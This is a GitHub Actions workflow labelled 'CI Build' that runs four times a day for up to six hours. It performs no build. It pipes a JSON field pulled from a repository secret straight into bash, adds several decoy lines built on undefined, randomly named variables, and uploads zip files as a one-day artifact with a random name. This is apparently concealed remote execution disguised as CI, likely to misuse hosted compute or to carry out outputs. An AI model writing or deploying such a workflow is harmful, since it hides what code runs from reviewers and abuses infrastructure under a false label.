name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '53 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  task:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Execute
        env:
          unim3: ${{ secrets.unim3 }}
        run: |
          printf '%s' "$unim3" | jq -r .q30 | /bin/bash
          echo $rw9864 | jq -r .fsvo25718 | /bin/bash
          echo $qkdz270 | jq -r .yc6 | /bin/bash
          printf '%s' "$rmte984" | jq -r .wtpct90542 | /bin/bash
          printf '%s' "$vtxr86562" | jq -r .eox835 | /bin/bash
          echo $a426 | jq -r .f8 | /bin/bash
          echo $sjybx098 | jq -r .f8 | /bin/bash
          echo $oq857 | jq -r .n5 | /bin/bash

      - name: Upload artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: VuR5OrP2
          path: "*.zip"
          retention-days: 1
